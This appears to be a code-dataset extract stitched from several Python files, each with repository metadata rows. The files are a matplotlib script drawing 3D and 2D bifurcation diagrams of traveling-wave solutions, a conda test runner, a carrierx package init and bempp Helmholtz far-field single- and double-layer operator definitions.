bifx2,bify2 = clean(bifx2_bndd,bify2_bndd,tol=.3)
bif_diagx,bif_diagy = clean(bif_diagx_bndd,bif_diagy_bndd,tol=5)
# clean
#bifx,bify = clean(bif[:,3],bif[:,7],tol=.47)
#bifx2,bify2 = clean(bif[:,3],bif[:,8],tol=.47)
#bif_diag1x,bif_diag1y = clean(bif_diag1[:,0],np.abs(bif_diag1[:,1]),tol=.2)
#bif_diag2x,bif_diag2y = clean(bif_diag2[:,0],np.abs(bif_diag2[:,1]),tol=.2)
# create equivalent arrays without nans before calculating minima (np.argmin/np.argmax otherwise return the position of a nan)
bifx_nonan = bifx[(~np.isnan(bifx))*(~np.isnan(bify))]
bify_nonan = bify[(~np.isnan(bifx))*(~np.isnan(bify))]
bifx2_nonan = bifx2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bify2_nonan = bify2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bif_diagx_nonan = bif_diagx[(~np.isnan(bif_diagx))*(~np.isnan(bif_diagy))]
bif_diagy_nonan = bif_diagy[(~np.isnan(bif_diagx))*(~np.isnan(bif_diagy))]
plane1_z = .895
plane2_z = 1.17
# get plane intersection idx
bifx_int_p1 = np.argmin(np.abs(bifx_nonan-plane1_z))
bifx_int_p2 = np.argmin(np.abs(bifx_nonan-plane2_z))
bifx2_int_p1 = np.argmin(np.abs(bifx2_nonan-plane1_z))
bifx2_int_p2 = np.argmin(np.abs(bifx2_nonan-plane2_z))
bif_diagx_int_p1 = np.argmin(np.abs(bif_diagx_nonan-plane1_z))
bif_diagx_int_p2 = np.argmin(np.abs(bif_diagx_nonan-plane2_z))
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121,projection='3d')
ax2 = fig.add_subplot(122)
# prep for plotting with different line widths
diagx = bif_diagy
diagy = bif_diagx
diagz = bif_diagy
## plot curves in 3d
# plot off diagonal and axial curves
# clean for 3d plot
ga,v1a,v2a = clean3d(bifx,bify2,bify,tol=.391)
# add modified curves to figure (non diagonal guys)
#ax1.add_collection3d(collect3d_colorgrad(v1a,ga,v2a,use_nonan=False,zorder=2,lwstart=3,lwend=6,cmapmin=.2,cmapmax=1.))
ax1.add_collection3d(collect3d_colorgrad(v2a,ga,v1a,use_nonan=False,zorder=2,
cmapmin=.2,cmapmax=1.,
lwstart=2,lwend=6.))
ax1.add_collection3d(collect3d_colorgrad(v1a,ga,v2a,use_nonan=False,zorder=2,
cmapmin=.2,cmapmax=1.,
lwstart=2,lwend=6.))
# plot diagonal branches
ax1.add_collection3d(collect3d_colorgrad(diagx,diagy,diagz,use_nonan=False,zorder=2,
cmapmin=.2,cmapmax=1.,
lwstart=6.,lwend=2.))
# hacky workaround for a clipping/zorder issue
#ax1.plot([.55],[1.458],[.55],marker='s',color='#ffae6e',markeredgecolor='#ffae6e',zorder=10,markersize=5)
#ax1.plot([.565],[1.46],[.565],marker='s',color='#ffae6e',markeredgecolor='#ffae6e',zorder=10,markersize=5)
#ax1.plot([.32],[1.11],[.32],marker='s',color='#b77449',markeredgecolor='#b77449',zorder=10,markersize=3)
print('diagx,diagy,diagz',diagx,diagy,diagz)
# plot zero solution
gt = np.linspace(.5,.9,10)
ax1.add_collection3d(collect3d_colorgrad(0.*gt,gt,0.*gt,zorder=10,cmapmax=.4,lwend=2.))
#ax1.plot([.0,0],[.5,plane1_z],[.0,0],color='black',lw=1)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,.8,2),np.linspace(0,.8,2))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.2,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.2,color='red')
# plot plane intersections
ax1.plot([bify[bifx_int_p1]],[bifx[bifx_int_p1]],[bify2[bifx_int_p1]],color='black',marker='o',markersize=8,zorder=100)
#ax1.scatter(bify[bifx_int_p2],bifx[bifx_int_p2],bify2[bifx_int_p2],color='black',s=20)
ax1.plot([0.],[1.17],[.51],marker='o',markersize=6,color='red',markeredgecolor='none',zorder=100)
ax1.plot([.51],[1.17],[0.],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=100)
ax1.plot([.38],[1.17],[.38],marker='o',markersize=7,color='red',markeredgecolor='none',zorder=100)
# plot projection of plane intersections
ax1.plot([0.],[1.6],[.51],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=5)
ax1.plot([.51],[1.6],[0.],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=100)
ax1.plot([.38],[1.6],[.38],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=2)
ax1.plot([0],[1.6],[0],marker='o',markersize=8,color='black',markeredgecolor='none',zorder=2)
## plot curves in 2d
zs = 1.6
# axial branches
ax2.add_collection(collect(bify,bify2,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.))
ax2.add_collection(collect(bify2,bify,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.))
ax1.add_collection3d(collect(bify,bify2,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.),zs=zs,zdir='y')
ax1.add_collection3d(collect(bify2,bify,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.),zs=zs,zdir='y')
# diagonal
ax2.add_collection(collect(diagx,diagz,lwstart=3.,lwend=6,cmapmin=.2,cmapmax=1.))
ax1.add_collection3d(collect(diagx,diagz,lwstart=3.,lwend=6,cmapmin=.2,cmapmax=1.),zs=zs,zdir='y')
# bifurcation points lines
ax2.scatter(0,.52,s=70,color='red',zorder=10) # axial intersection (y-axis)
ax2.scatter(.52,0.,s=70,color='red',zorder=10) # axial intersection (x-axis)
ax2.scatter(.38,.38,s=70,color='red',zorder=10) # diagonal intersection
ax2.scatter(0.,0.,s=70,color='black',zorder=10) # diagonal intersection
# label curves
ax2.annotate(r'$x$-axis direction',
xy=(.6,.01),xycoords='data',textcoords='data',
xytext=(.6,.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(.01,.6),xycoords='data',textcoords='data',
xytext=(.1,.7),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.03,.015),xycoords='data',textcoords='data',
xytext=(.15,.05),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.1,.32),xycoords='data',textcoords='data',
xytext=(1.4,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.41),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,.62),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.view_init(20,-8)
# set labels
ax1.set_xlabel(r'$\nu_1$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_2$')
ax2.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_2$')
ax1.set_xlim(0.,.8)
ax1.set_ylim(.5,1.6)
ax1.set_zlim(0,.8)
ax2.set_xlim(-.05,.8)
ax2.set_ylim(-.05,.8)
# plot params
#ax1.view_init(20,-8)
#plt.show()
return fig
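The bifurcation planes drawn throughout these figures use one idiom: `np.meshgrid` builds the `(nu1, nu2)` face and the constant array `0.*X + plane_z` pins every grid point to a fixed `g`, so `plot_surface` renders a translucent plane normal to the `g`-axis. A self-contained sketch (headless `Agg` backend, illustrative values):

```python
# Sketch of the constant-g bifurcation-plane idiom used above.
import numpy as np
import matplotlib
matplotlib.use('Agg')  # headless backend for this sketch
import matplotlib.pyplot as plt

plane_z = 1.17
X, Y = np.meshgrid(np.linspace(0, 1, 10), np.linspace(0, 1, 10))
G = 0.*X + plane_z  # every grid point sits at g = plane_z

fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.plot_surface(X, G, Y, alpha=.2, color='red')  # plane normal to the g-axis
```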
def truncate_branches(val,ty,gmin,gmax,vimin,vimax):
val_final = {}
ty_final = {}
for key in val.keys():
g = val[key][:,0]
v1 = val[key][:,2]
v2 = val[key][:,3]
idx = ((g>=gmin)*(g<=gmax)*
(v1>=vimin)*(v1<=vimax)*
(v2>=vimin)*(v2<=vimax))
if (len(g[idx]) == 0) or\
(len(v1[idx]) == 0) or\
(len(v2[idx]) == 0):
pass
else:
print(key,ty[key][0,1])
val_final[key] = np.zeros((len(g[idx]),3))
val_final[key][:,0] = g[idx]
val_final[key][:,1] = v1[idx]
val_final[key][:,2] = v2[idx]
ty_final[key] = ty[key]
return val_final,ty_final
def wave_exist_2d_full_v4(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
# get data
bif = np.loadtxt('twod_wave_exist_v2.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
#bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag_v2.dat')
# get all possible disjoint branches
val,ty = collect_disjoint_branches(bif,remove_isolated=True,isolated_number=3,remove_redundant=False,N=10)
val_di,ty_di = collect_disjoint_branches(bif_diag2,remove_isolated=True,isolated_number=3,remove_redundant=False,N=10)
plane1_z = .895
plane2_z = 1.16
if False:
mp.figure()
for key in val.keys():
mp.plot(val[key][:,1],val[key][:,2],label=key)
mp.legend()
mp.show()
# fix branches to satisfy bounds
# bound the values: .7 <= g <= 1.6, 0 <= vi <= .85
gmin = .7
gmax = 1.6
vimin = 0.
vimax = .85
val_final,ty_final = truncate_branches(val,ty,gmin,gmax,vimin,vimax)
val_di_final,ty_di_final = truncate_branches(val_di,ty_di,gmin,gmax,vimin,vimax)
# use this plot to choose branches
if False:
mp.figure()
for key in val_final.keys():
mp.plot(val_final[key][:,1],val_final[key][:,2],label=key)
mp.legend()
mp.show()
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax1 = fig.add_axes(MyAxes3D(ax1, 'l'))
ax2 = fig.add_subplot(122)
# add modified curves to figure
for key in val_final.keys():
g = val_final[key][:,0]
v1 = val_final[key][:,1]
v2 = val_final[key][:,2]
if key == 'br13' or key == 'br6':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=2,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=.7))
elif key == 'br26' or key == 'br14' or key == 'br2' or key == 'br8':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=2,
lwstart=4,lwend=5,
cmapmin=.7,cmapmax=1.))
for key in val_di_final.keys():
g = val_di_final[key][:,0]
v1 = val_di_final[key][:,1]
v2 = val_di_final[key][:,2]
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=2,
lwstart=2,lwend=5,
cmapmin=.3,cmapmax=1.))
# plot the initial zero branch
g = np.linspace(gmin,plane1_z,10)
ax1.add_collection3d(collect3d_colorgrad(0.*g,g,0.*g,use_nonan=False,zorder=2,
lwstart=1,lwend=2,
cmapmin=.1,cmapmax=.3))
    # plot bifurcation planes
    X, Y = np.meshgrid(np.linspace(0, vimax, 10), np.linspace(0, vimax, 10))
    Xhalf1, Yhalf1 = np.meshgrid(np.linspace(0., .5, 10), np.linspace(0, .5, 20))
    Xhalf2, Yhalf2 = np.meshgrid(np.linspace(.5, vimax, 10), np.linspace(0, vimax, 20))
    Xhalf1b, Yhalf1b = np.meshgrid(np.linspace(.0, .5, 10), np.linspace(.5, vimax, 20))
    #Xhalf2b,Yhalf2b = np.meshgrid(np.linspace(.5,vimax,10),np.linspace(0,vimax,20))
    ax1.plot_surface(X, 0.*X + plane1_z, Y, alpha=.5, color='red', edgecolor='none')
    ax1.plot_surface(Xhalf1, 0.*Xhalf1 + plane2_z, Yhalf1, alpha=.6, color='green', lw=0, edgecolor='none', zorder=1)
    ax1.plot_surface(Xhalf2, 0.*Xhalf2 + plane2_z, Yhalf2, alpha=.6, color='green', lw=0, edgecolor='none', zorder=3)
    ax1.plot_surface(Xhalf1b, 0.*Xhalf1b + plane2_z, Yhalf1b, alpha=.6, color='green', lw=0, edgecolor='none', zorder=3)
    #ax1.plot_surface(X2,0.*X2+plane2_z,Y2,alpha=.5,color='red',edgecolor='none')
    #ax1.plot_surface(X[X>3],0.*X[X>3]+plane2_z,Y[X>3],alpha=.5,color='red',edgecolor='none')
    # plot intersection points
    #ax1.plot([bify[bifx_int_p1]],[bifx[bifx_int_p1]],[bify2[bifx_int_p1]],color='black',marker='o',markersize=8,zorder=100)
    #ax1.scatter(bify[bifx_int_p2],bifx[bifx_int_p2],bify2[bifx_int_p2],color='black',s=20)
    ax1.plot([0.], [plane1_z], [.0], marker='o', markersize=8, color='black', markeredgecolor='none', zorder=100)
    ax1.plot([0.], [1.17], [.51], marker='o', markersize=8, color='red', markeredgecolor='none', zorder=100)
    ax1.plot([.51], [1.17], [0.], marker='o', markersize=8, color='red', markeredgecolor='none', zorder=100)
    ax1.plot([.38], [1.17], [.38], marker='o', markersize=8, color='red', markeredgecolor='none', zorder=100)
    # plot projection of plane intersections
    ax1.plot([0.], [1.6], [.51], marker='o', markersize=8, color='red', markeredgecolor='none', zorder=5)
    ax1.plot([.51], [1.6], [0.], marker='o', markersize=8, color='red', markeredgecolor='none', zorder=5)
    ax1.plot([.38], [1.6], [.38], marker='o', markersize=8, color='red', markeredgecolor='none', zorder=5)
    ax1.plot([0], [1.6], [0], marker='o', markersize=8, color='black', markeredgecolor='none', zorder=2)
    # plot curves in 2d + 2d projection in 3d plot
    zs = gmax
    for key in val_final.keys():
        g = val_final[key][:, 0]
        v1 = val_final[key][:, 1]
        v2 = val_final[key][:, 2]
        if key in ('br13', 'br6'):
            ax2.add_collection(collect(v1, v2, use_nonan=False, zorder=3,
                                       lwstart=2, lwend=4,
                                       cmapmin=.3, cmapmax=1.))
            ax1.add_collection3d(collect(v1, v2, use_nonan=False, zorder=2,
                                         lwstart=2, lwend=4,
                                         cmapmin=.3, cmapmax=1.), zs=zs, zdir='y')
        elif key in ('br26', 'br14', 'br2', 'br8'):
            ax2.add_collection(collect(v1, v2, use_nonan=False, zorder=3,
                                       lwstart=4, lwend=5,
                                       cmapmin=.6, cmapmax=1.))
            ax1.add_collection3d(collect(v1, v2, use_nonan=False, zorder=2,
                                         lwstart=4, lwend=5,
                                         cmapmin=.6, cmapmax=1.), zs=zs, zdir='y')
    # bifurcation points
    ax2.scatter(0, .52, s=70, color='red', zorder=10)    # axial intersection (y-axis)
    ax2.scatter(.52, 0., s=70, color='red', zorder=10)   # axial intersection (x-axis)
    ax2.scatter(.38, .38, s=70, color='red', zorder=10)  # diagonal intersection
    ax2.scatter(0., 0., s=70, color='black', zorder=10)  # origin
    for key in val_di_final.keys():
        g = val_di_final[key][:, 0]
        v1 = val_di_final[key][:, 1]
        v2 = val_di_final[key][:, 2]
        ax2.add_collection(collect(v1, v2, use_nonan=False, zorder=3,
                                   lwstart=2, lwend=5,
                                   cmapmin=.3, cmapmax=1.))
        ax1.add_collection3d(collect(v1, v2, use_nonan=False, zorder=2,
                                     lwstart=2, lwend=5,
                                     cmapmin=.3, cmapmax=1.), zs=zs, zdir='y')
    ax2.annotate(r'$x$-axis direction',
                 xy=(.3, .01), xycoords='data', textcoords='data',
                 xytext=(.3, .17),
                 arrowprops=dict(arrowstyle="-|>",
                                 connectionstyle="arc3",
                                 color='black'),
                 )
    ax2.annotate(r'$y$-axis direction',
                 xy=(.01, .3), xycoords='data', textcoords='data',
                 xytext=(.1, .45),
                 arrowprops=dict(arrowstyle="-|>",
                                 connectionstyle="arc3",
                                 color='black'),
                 )
    ax2.annotate(r'$g^*$',
                 xy=(.03, .015), xycoords='data', textcoords='data',
                 xytext=(.2, .07),
                 arrowprops=dict(arrowstyle="-|>",
                                 connectionstyle="arc3",
                                 color='black'),
                 )
    ax2.annotate('Diagonal direction',
                 xy=(.48, .5), xycoords='data', textcoords='data',
                 xytext=(.15, .65),
                 arrowprops=dict(arrowstyle="-|>",
                                 connectionstyle="arc3",
                                 color='black'),
                 )
    ax2.annotate('Off-diagonal',
                 xy=(.7, .55), xycoords='data', textcoords='data',
                 xytext=(.65, .75),
                 arrowprops=dict(arrowstyle="-|>",
                                 connectionstyle="arc3",
                                 color='black'),
                 )
    ax2.annotate('Off-diagonal',
                 alpha=0.,
                 xy=(.55, .7), xycoords='data', textcoords='data',
                 xytext=(.65, .75),
                 arrowprops=dict(arrowstyle="-|>",
                                 connectionstyle="arc3",
                                 color='black'),
                 )
    ax2.annotate('Multiple non-axial directions',
                 xy=(3.68, .1), xycoords='data', textcoords='data',
                 xytext=(3., .5),
                 arrowprops=dict(arrowstyle="-|>",
                                 connectionstyle="arc3",
                                 color='black'),
                 )
    #ax1.plot([.89,.89],[-3,3],color='gray')
    #ax1.plot([3.,3.],[-3,3],color='gray')
    ax1.view_init(20, -8)
    """
    tmp_planes = ax1.zaxis._PLANES
    ax1.zaxis._PLANES = (tmp_planes[2], tmp_planes[3],
                         tmp_planes[0], tmp_planes[1],
                         tmp_planes[4], tmp_planes[5])
    """
    ax1.set_xlim(vimin, vimax)
    ax1.set_ylim(gmin, gmax)
    ax1.set_zlim(vimin, vimax)
    ax1.set_xlabel(r'$\nu_1$')
    ax1.set_ylabel(r'$g$')
    ax1.set_zlabel(r'$\nu_2$')
    ax2.set_xlabel(r'$\nu_1$')
    ax2.set_ylabel(r'$\nu_2$')
    ax2.set_xlim(-.05 + vimin, vimax)
    ax2.set_ylim(-.05 + vimin, vimax)
    return fig
def twod_superfig():
    """
    create summary of dynamics
    """
    fig = plt.figure(figsize=(7, 7))
    gs = gridspec.GridSpec(6, 6)
    axl = []
    #gs.update(hspace=.4)
    #gs.update(wspace=.3)
    # params
    g = np.zeros((6, 6))
    q = np.zeros((6, 6))
    # slosh, large slosh, const vel (per), const vel (nonper), nonconst vel (per), nonconst vel (chaos)
    # list of models
    models = ['2dfull', '2dfulltrunc', '2dphs', '2dphstrunc', '2dphsgauss']
    # 2d full
    g[0, :] = np.array([3., -1, 3., 3., -1., 3.])
    q[0, :] = np.array([1., -1, 0., 0., -1., 1.])
    # 2d full trunc
    for i in range(6):
        # loop over rows. each axl[i,:] is for plots of model i
        for j in range(6):
            # loop over params. each axl[i,j] is plot j of model i
            axl.append(plt.subplot(gs[i, j]))
    """
    ax11 = plt.subplot(gs[0, 0])
    ax12 = plt.subplot(gs[0, 1])
    ax13 = plt.subplot(gs[0, 2])
    ax14 = plt.subplot(gs[0, 3])
    ax15 = plt.subplot(gs[0, 4])
    ax16 = plt.subplot(gs[0, 5])
    """
    #ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=2)
    #ax21 = plt.subplot2grid((4,4),(2,0),colspan=3,rowspan=1,sharex=ax11)
    #ax21 = plt.subplot(gs[2,:3],sharex=ax11)
def generate_figure(function, args, filenames, title="", title_pos=(0.5, 0.95)):
    # workaround for python bug where forked processes use the same random
    # filename.
    #tempfile._name_sequence = None;
    fig = function(*args)
    #fig.text(title_pos[0], title_pos[1], title, ha='center')
    if type(filenames) == list:
        for name in filenames:
            if name.split('.')[-1] == 'ps':
                fig.savefig(name, orientation='landscape')
            else:
                fig.savefig(name)
    else:
        # filenames is a single filename string here
        if filenames.split('.')[-1] == 'ps':
            fig.savefig(filenames, orientation='landscape')
        else:
            fig.savefig(filenames)
def main():
    figures = [
        #(oned_phase_2par,[1,False],['oned_phase_2par1.pdf']),
        #(oned_phase_2par,[2,False],['oned_phase_2par2.pdf']),
        #(oned_phase_2par,[3,False],['oned_phase_2par3.pdf']),
        #(oned_phase_2par,[4,False],['oned_phase_2par4.pdf']),
        #(oned_phase_2par,[5,False],['oned_phase_2par5.pdf']),
        #(oned_phase_2par,[5,True],['oned_phase_2par5b.pdf']),
        #(oned_full_2par,[1,True],['oned_full_2par1.pdf']),
        #(oned_full_2par,[2,True],['oned_full_2par2.pdf']),
        #(oned_full_2par,[3,True],['oned_full_2par3.pdf']),
        #(oned_full_2par,[4,True],['oned_full_2par4.pdf']),
        #(oned_full_2par,[5,True],['oned_full_2par5.pdf']),
        # run this one in generate_figures.py
        #(twod_full_auto_5terms_2par,[],['twod_full_auto_5terms_2par.pdf'])
        (twod_phase_2par, [1], ['twod_phase_2par1.pdf']),
        (twod_phase_2par, [2], ['twod_phase_2par2.pdf']),
        (twod_phase_2par, [3], ['twod_phase_2par3.pdf']),
        (twod_phase_2par, [4], ['twod_phase_2par4.pdf']),
    ]
    for fig in figures:
        generate_figure(*fig)

if __name__ == "__main__":
    main()
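The `generate_figure` helper above dispatches on whether `filenames` is a list or a single string, duplicating the save logic in both branches (which is exactly the kind of duplication that invites the undefined-variable slip in the original `else` branch). A minimal stand-alone sketch of the same dispatch, normalized to a single loop — the helper names are mine, and no matplotlib is needed to show the idea:

```python
def normalize_filenames(filenames):
    """Return a list of output filenames whether one name or many is given."""
    if isinstance(filenames, list):
        return filenames
    return [filenames]

def save_kwargs(name):
    """PostScript output gets landscape orientation, mirroring generate_figure."""
    if name.split('.')[-1] == 'ps':
        return {'orientation': 'landscape'}
    return {}

# every name now flows through one code path:
#   for name in normalize_filenames(filenames):
#       fig.savefig(name, **save_kwargs(name))
names = normalize_filenames('fig.ps')
opts = [save_kwargs(n) for n in names]
```

With this shape, adding another format-specific option only touches `save_kwargs`.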
| 33.910273 | 756 | 0.513889 | 36,961 | 263,415 | 3.542897 | 0.044398 | 0.02291 | 0.025292 | 0.031272 | 0.810697 | 0.772308 | 0.748291 | 0.721846 | 0.697775 | 0.676951 | 0 | 0.073508 | 0.297527 | 263,415 | 7,767 | 757 | 33.914639 | 0.634164 | 0.134734 | 0 | 0.623423 | 1 | 0.000952 | 0.069067 | 0.012955 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002142 | 0.006903 | null | null | 0.01214 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3ebf6d1a066f0eb14ae871dec1b57e45675a70fe | 37 | py | Python | conda.recipe/run_test.py | ianthomas23/tile-fetch | c5cf4328523ed2859aa5c6012eb36da9657f582f | [
"BSD-2-Clause"
] | 5 | 2018-01-31T21:20:59.000Z | 2022-01-07T00:46:00.000Z | conda.recipe/run_test.py | ianthomas23/tile-fetch | c5cf4328523ed2859aa5c6012eb36da9657f582f | [
"BSD-2-Clause"
] | 5 | 2018-01-30T16:21:52.000Z | 2018-01-31T06:01:41.000Z | conda.recipe/run_test.py | parietal-io/tile-fetch | 9e91899adeeaf1ed307d086e3e5e4015657ddd3d | [
"BSD-2-Clause"
] | 1 | 2021-09-29T11:05:34.000Z | 2021-09-29T11:05:34.000Z | import tile_fetch; tile_fetch.test()
| 18.5 | 36 | 0.810811 | 6 | 37 | 4.666667 | 0.666667 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 37 | 1 | 37 | 37 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3eede45f7c38f8cc17522b0c541b9802633b4afe | 122 | py | Python | carrierx/resources/mediator/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/mediator/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/mediator/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | 1 | 2020-03-26T15:13:10.000Z | 2020-03-26T15:13:10.000Z | from carrierx.resources.mediator.bindings import Binding, Bindings
from carrierx.resources.mediator.dids import Did, Dids
| 40.666667 | 66 | 0.852459 | 16 | 122 | 6.5 | 0.5625 | 0.230769 | 0.403846 | 0.557692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081967 | 122 | 2 | 67 | 61 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
41084dc3ab9c3312410036cd788bd63344b8bdb7 | 2,227 | py | Python | bempp/api/operators/far_field/helmholtz.py | pescap/bempp-cl | 3a68666e8db0e873d418b734289067483f68f12e | [
"MIT"
] | 70 | 2019-09-04T15:15:05.000Z | 2022-03-22T16:54:40.000Z | bempp/api/operators/far_field/helmholtz.py | pescap/bempp-cl | 3a68666e8db0e873d418b734289067483f68f12e | [
"MIT"
] | 66 | 2020-01-16T08:31:00.000Z | 2022-03-25T11:18:59.000Z | bempp/api/operators/far_field/helmholtz.py | pescap/bempp-cl | 3a68666e8db0e873d418b734289067483f68f12e | [
"MIT"
] | 22 | 2019-09-30T08:50:33.000Z | 2022-03-20T19:37:22.000Z | """Helmholtz far-field operators."""
import numpy as _np
def single_layer(
    space,
    points,
    wavenumber,
    parameters=None,
    assembler="dense",
    device_interface=None,
    precision=None,
):
    """Return a Helmholtz single-layer far-field potential operator."""
    import bempp.api
    from bempp.api.operators import OperatorDescriptor
    from bempp.api.assembly.potential_operator import PotentialOperator
    from bempp.api.assembly.assembler import PotentialAssembler

    if precision is None:
        precision = bempp.api.DEFAULT_PRECISION

    operator_descriptor = OperatorDescriptor(
        "helmholtz_far_field_single_layer_potential",  # Identifier
        [_np.real(wavenumber), _np.imag(wavenumber)],  # Options
        "helmholtz_far_field_single_layer",  # Kernel type
        "default_scalar",  # Assembly type
        precision,  # Precision
        True,  # Is complex
        None,  # Singular part
        1,  # Kernel dimension
    )
    return PotentialOperator(
        PotentialAssembler(
            space, points, operator_descriptor, device_interface, assembler, parameters
        )
    )
def double_layer(
    space,
    points,
    wavenumber,
    parameters=None,
    assembler="dense",
    device_interface=None,
    precision=None,
):
    """Return a Helmholtz double-layer far-field potential operator."""
    import bempp.api
    from bempp.api.operators import OperatorDescriptor
    from bempp.api.assembly.potential_operator import PotentialOperator
    from bempp.api.assembly.assembler import PotentialAssembler

    if precision is None:
        precision = bempp.api.DEFAULT_PRECISION

    operator_descriptor = OperatorDescriptor(
        "helmholtz_far_field_double_layer_potential",  # Identifier
        [_np.real(wavenumber), _np.imag(wavenumber)],  # Options
        "helmholtz_far_field_double_layer",  # Kernel type
        "default_scalar",  # Assembly type
        precision,  # Precision
        True,  # Is complex
        None,  # Singular part
        1,  # Kernel dimension
    )
    return PotentialOperator(
        PotentialAssembler(
            space, points, operator_descriptor, device_interface, assembler, parameters
        )
    )
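Both operators pack the (possibly complex) wavenumber into the descriptor's options list as a two-element `[Re k, Im k]` pair. A stand-alone sketch of that packing and its inverse, in plain Python with no bempp dependency — the helper names are illustrative, not part of the bempp API:

```python
def pack_wavenumber(wavenumber):
    """Split a (possibly complex) wavenumber into [real, imag] descriptor options."""
    k = complex(wavenumber)  # real inputs become k + 0j
    return [k.real, k.imag]

def unpack_wavenumber(options):
    """Rebuild the complex wavenumber from a two-element options list."""
    return complex(options[0], options[1])

opts = pack_wavenumber(2.5 + 0.1j)  # [2.5, 0.1]
```

Storing the two real parts separately is what lets the descriptor stay a flat list of plain floats while still supporting lossy media (nonzero imaginary part).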
| 29.693333 | 87 | 0.683431 | 222 | 2,227 | 6.68018 | 0.225225 | 0.053945 | 0.04855 | 0.053945 | 0.952124 | 0.935941 | 0.935941 | 0.935941 | 0.935941 | 0.935941 | 0 | 0.001182 | 0.240234 | 2,227 | 74 | 88 | 30.094595 | 0.875296 | 0.156713 | 0 | 0.786885 | 0 | 0 | 0.100704 | 0.08013 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0 | 0.147541 | 0 | 0.213115 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f5af44ea4676182c23f4bba121b6e926da2a96ce | 13,402 | py | Python | app/uBrain/model/model_hub.py | jingjieli95/UnarySim | 775b38fa2d6b05a69fd73acb4766e50200a5cc37 | [
"MIT"
] | 1 | 2021-11-29T23:51:15.000Z | 2021-11-29T23:51:15.000Z | app/uBrain/model/model_hub.py | pan185/UnarySim | c03386efdbb8151f3c33f34b44d1d6a6fc960434 | [
"MIT"
